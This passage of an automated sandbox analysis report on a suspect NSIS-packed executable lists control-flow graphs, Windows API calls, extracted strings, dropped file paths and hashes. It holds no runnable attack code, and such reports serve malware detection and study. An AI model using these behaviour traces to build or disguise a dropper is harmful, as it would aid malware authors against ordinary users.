                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID: xgB
                                                                                                                    • API String ID: 2295610775-399326502
                                                                                                                    • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                    • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                    • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                    • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 268 40408c-404091 call 4043ab 264->268 269 40404e-404051 264->269 265->264 270 403eb5-403ec2 SetWindowPos 266->270 271 403ec8-403ecb 266->271 283 404096-4040b1 268->283 275 404053-40405e call 401389 269->275 276 404084-404086 269->276 270->271 272 403ee5-403eeb 271->272 273 403ecd-403edf ShowWindow 271->273 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->268 282 40432c 276->282 287 403f0c-403f18 SetWindowLongW 278->287 288 403f1d-403f23 278->288 284 404309-40430f 279->284 286 40432e-404335 282->286 290 4040b3-4040b5 call 40140b 283->290 291 4040ba-4040c0 283->291 284->282 293 404311-404317 284->293 287->286 296 403fc6-403fd4 call 4043c6 288->296 297 403f29-403f3a GetDlgItem 288->297 290->291 294 4040c6-4040d1 291->294 295 4042ea-404303 DestroyWindow EndDialog 291->295 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->284 296->286 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->286 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->296 315->309 317 403f81-403f87 call 40140b 316->317 318 403f96-403f9f call 40140b 316->318 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->284 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->284 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->284
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                    • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                    • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                    • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                    • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                    • String ID: (7B
                                                                                                                    • API String ID: 3282139019-3251261122
                                                                                                                    • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                    • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                    • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                    • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 379 403b5e-403b87 call 403dae call 405dc5 369->379 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->379 376->375 384 403c19-403c21 call 405dc5 379->384 385 403b8d-403b92 379->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 387 403b98-403bb2 call 4062b6 385->387 390 403bb7-403bc0 387->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 397 403bd8-403be4 lstrlenW 393->397 398 403bc8-403bd5 call 405cea 393->398 409 403ce7-403cf2 call 403dae 395->409 410 403cdf-403ce2 395->410 399 403da4 396->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->400 404 403be6-403bf4 lstrcmpiW 397->404 405 403c0c-403c14 call 405cbd call 4063e8 397->405 398->397 403 403da6-403dad 399->403 400->395 404->405 408 403bf6-403c00 GetFileAttributesW 404->408 405->384 412 403c02-403c04 408->412 413 403c06-403c07 call 405d09 408->413 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->403 412->405 412->413 413->405 425 403d14-403d19 call 406752 419->425 426 403d1e-403d30 GetClassInfoW 419->426 427 403d85-403d8b 420->427 428 403d9d-403d9f call 40140b 420->428 425->426 431 403d32-403d42 GetClassInfoW RegisterClassW 426->431 432 403d48-403d6b DialogBoxParamW call 40140b 426->432 427->410 433 403d91-403d98 call 40140b 427->433 428->399 431->432 437 403d70-403d79 call 403a28 432->437 433->410 437->403
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                      • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                    • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00000000), ref: 00403B59
                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Iw), ref: 00403C40
                                                                                                                      • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                    • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                    • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: "C:\Users\user\Desktop\9Yn5tjyOgT.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                    • API String ID: 1975747703-1495971130
                                                                                                                    • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                                    • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                                    • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                                    • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 492 4030df-4030e5 462->492 489 403139-40313e 463->489 490 40314d-40317d call 40345d call 4031d6 463->490 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 485 40300e-403015 470->485 473->474 481 403087-403095 call 4068b5 474->481 482 403098-4030a2 474->482 481->482 482->452 482->453 485->474 491 403017-40301e 485->491 489->445 500 403182-403185 490->500 491->474 493 403020-403027 491->493 492->459 492->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\9Yn5tjyOgT.exe,00000400), ref: 00402F60
                                                                                                                      • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\9Yn5tjyOgT.exe,80000000,00000003), ref: 00405EE2
                                                                                                                      • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\9Yn5tjyOgT.exe,C:\Users\user\Desktop\9Yn5tjyOgT.exe,80000000,00000003), ref: 00402FA9
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                    • String ID: "C:\Users\user\Desktop\9Yn5tjyOgT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\9Yn5tjyOgT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                    • API String ID: 2803837635-2786456596
                                                                                                                    • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                    • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                    • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                    • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 788 40640a-406415 789 406417-406426 788->789 790 406428-40643e 788->790 789->790 791 406444-406451 790->791 792 406656-40665c 790->792 791->792 793 406457-40645e 791->793 794 406662-40666d 792->794 795 406463-406470 792->795 793->792 797 406678-406679 794->797 798 40666f-406673 call 4063e8 794->798 795->794 796 406476-406482 795->796 800 406643 796->800 801 406488-4064c6 796->801 798->797 804 406651-406654 800->804 805 406645-40664f 800->805 802 4065e6-4065ea 801->802 803 4064cc-4064d7 801->803 808 4065ec-4065f2 802->808 809 40661d-406621 802->809 806 4064f0 803->806 807 4064d9-4064de 803->807 804->792 805->792 810 4064f7-4064fe 806->810 807->806 813 4064e0-4064e3 807->813 814 406602-40660e call 4063e8 808->814 815 4065f4-406600 call 40632f 808->815 811 406630-406641 lstrlenW 809->811 812 406623-40662b call 40640a 809->812 817 406500-406502 810->817 818 406503-406505 810->818 811->792 812->811 813->806 821 4064e5-4064e8 813->821 825 406613-406619 814->825 815->825 817->818 823 406540-406543 818->823 824 406507-40652e call 4062b6 818->824 821->806 826 4064ea-4064ee 821->826 829 406553-406556 823->829 830 406545-406551 GetSystemDirectoryW 823->830 836 406534-40653b call 40640a 824->836 837 4065ce-4065d1 824->837 825->811 828 40661b 825->828 826->810 832 4065de-4065e4 call 40667c 828->832 834 4065c1-4065c3 829->834 835 406558-406566 GetWindowsDirectoryW 829->835 833 4065c5-4065c9 830->833 832->811 833->832 839 4065cb 833->839 834->833 838 406568-406572 834->838 835->834 836->833 837->832 842 4065d3-4065d9 lstrcatW 837->842 844 406574-406577 838->844 845 40658c-4065a2 SHGetSpecialFolderLocation 838->845 839->837 842->832 844->845 849 406579-406580 844->849 846 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 845->846 847 4065bd 845->847 846->833 846->847 847->834 850 406588-40658a 849->850 850->833 850->845
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                    • API String ID: 717251189-1230650788
                                                                                                                    • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                                    • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                                    • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                                    • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 851 40176f-401794 call 402c41 call 405d34 856 401796-40179c call 4063e8 851->856 857 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 851->857 862 4017b5-4017b6 call 40667c 856->862 857->862 866 4017bb-4017bf 862->866 867 4017c1-4017cb call 40672b 866->867 868 4017f2-4017f5 866->868 875 4017dd-4017ef 867->875 876 4017cd-4017db CompareFileTime 867->876 870 4017f7-4017f8 call 405eb9 868->870 871 4017fd-401819 call 405ede 868->871 870->871 878 40181b-40181e 871->878 879 40188d-4018b6 call 405450 call 4031d6 871->879 875->868 876->875 880 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 878->880 881 40186f-401879 call 405450 878->881 891 4018b8-4018bc 879->891 892 4018be-4018ca SetFileTime 879->892 880->866 913 401864-401865 880->913 893 401882-401888 881->893 891->892 896 4018d0-4018db CloseHandle 891->896 892->896 897 402ace 893->897 900 4018e1-4018e4 896->900 901 402ac5-402ac8 896->901 899 402ad0-402ad4 897->899 903 4018e6-4018f7 call 40640a lstrcatW 900->903 904 4018f9-4018fc call 40640a 900->904 901->897 910 401901-4022fc call 405a4e 903->910 904->910 910->899 913->893 915 401867-401868 913->915 915->881
                                                                                                                    APIs
                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Vehefte190,?,?,00000031), ref: 004017B0
                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Vehefte190,?,?,00000031), ref: 004017D5
                                                                                                                      • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                      • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                      • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Iw\Vehefte190$C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp$C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll$Call
                                                                                                                    • API String ID: 1941528284-3377158383
                                                                                                                    • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                    • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                    • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                    • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 922 402ace-402ad4 920->922 923 402672 921->923 924 402675-402678 921->924 923->924 926 4027dc-4027e4 924->926 927 40267e-40268d call 406348 924->927 926->920 927->926 930 402693 927->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 935 402737-40273a 932->935 936 40274d-40275d call 405f61 932->936 933->926 934 4026c4-4026c9 933->934 934->926 937 4026cf-4026dd 934->937 935->936 938 40273c-402747 call 405fbf 935->938 936->926 944 40275f 936->944 940 4026e3-4026f5 MultiByteToWideChar 937->940 941 402798-4027a4 call 40632f 937->941 938->926 938->936 940->944 945 4026f7-4026fa 940->945 941->922 948 402762-402765 944->948 949 4026fc-402707 945->949 948->941 951 402767-40276c 948->951 949->948 952 402709-40272e SetFilePointer MultiByteToWideChar 949->952 953 4027a9-4027ad 951->953 954 40276e-402773 951->954 952->949 955 402730 952->955 957 4027ca-4027d6 SetFilePointer 953->957 958 4027af-4027b3 953->958 954->953 956 402775-402788 954->956 955->944 956->926 959 40278a-402790 956->959 957->926 960 4027b5-4027b9 958->960 961 4027bb-4027c8 958->961 959->931 962 402796 959->962 960->957 960->961 961->926 962->926
                                                                                                                    APIs
